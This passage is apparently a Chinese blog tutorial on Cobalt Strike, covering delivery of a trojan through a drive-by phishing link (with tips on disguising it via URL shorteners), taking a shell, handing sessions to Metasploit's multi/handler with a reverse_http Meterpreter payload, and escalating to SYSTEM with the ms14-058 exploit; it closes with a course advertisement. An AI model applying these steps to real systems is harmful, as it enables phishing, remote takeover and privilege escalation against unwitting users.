- 将生成的木马文件保存到一个文件夹下;
钓鱼链接
- 来到攻击模块
Attacks—>Web drive-by—>Host file;
- 复制生成的链接;(
注:小提一嘴,一般情况下直接发送链接很容易被识破,我们可以使用短链接生成器生成一个短链接,接着配合一些图片或页面,这样可以大大提高命中率,由于只是测试这里就不演示了哟,也是提供一个思路或方法)
- 将该恶意链接发送至目标靶机,当靶机用户访问时即会下载该木马文件;(注:需要关闭防火墙,杀毒软件等)
成功拿到shell
- 假设靶机用户比较好奇,无意中点击执行了该恶意文件,返回到CS中可以看到目标已成功上线;
- 拿到shell该怎么执行命令呢?别急别急,这就来了;
#查看IP信息
shell ipconfig
#查看用户
net user
- 执行desktop命令,还可看到靶机用户桌面实时情况;
CS如何联动MSF
所需环境
攻击机(kali)
目标靶机(win 10)
前提条件
- 必须确保目标靶机已成功上线,这里就不一一演示了哟;
MSF配置监听模块
- kali打开msfconsole;
- 设置模块,配置payload信息并执行攻击;
#使用监听模块
use exploit/multi/handler
#配置payload
set payload windows/meterpreter/reverse_http
#配置IP和端口
set lhost kali-ip
set lport 端口
#开始攻击
run/exploit
CS新建监听器
- 在CS中新建一个监听器;
- 配置一下基础的信息,值得注意的是IP和端口必须和msf监听的一致;
成功交互
- 右击后点击Interact进入命令模式;
- 接着点击Spawn添加,选择刚配置的监听payload;
- 等待命令执行完即可;
- 返回msf发现监听成功,成功进行交互;
CS如何进行提权操作
所需环境
攻击机(kali)
目标靶机(win 2008 R2)
前提条件
- 还是必须确保目标靶机已成功上线哟;
查看用户权限
- 打开视图命令,发现上线用户为普通用户;
- 打开命令模式,执行
getuid命令获取用户ID,有点慢稍等一会儿;
下载提权插件
- CS里面含有自动化的提权,来到提权模块;
- 默认提权的exp就只要下面这两个,肯定是不够的,所以得去加载一些提权的插件;
- 下载ElevateKit提权插件;
- 由于CS是在kali上,将该插件上传至kali以进行操作;
加载插件
- 接下来加载插件,选择脚本管理模块;
- 选择上传的插件,点击打开;
- 打印出插件路径说明上传成功了;
- 再次打开提权模块,发现
EXP果然更多了;
成功提权
- 选择好监听的目标和
ms14-058EXP后,开始提权;(注:不同的靶机需要用到的提权exp是不一样的,这里的靶机环境为win 2008 R2) - 过程也是会比较慢的,等待一会后成功提权至
system权限;
- 进入命令模式,执行
getuid命令查看当前用户成功提升至system权限;
还有一些其他的提权插件也还不错的,有兴趣可以下载试试;
https://github.com/DeEpinGh0st/Erebus
先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7
深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
需要这份系统化资料的朋友,可以点击这里获取
图片转存中…(img-PQPYaiZr-1714250628265)]
[外链图片转存中…(img-KJK9tBeP-1714250628265)]
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
2204
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
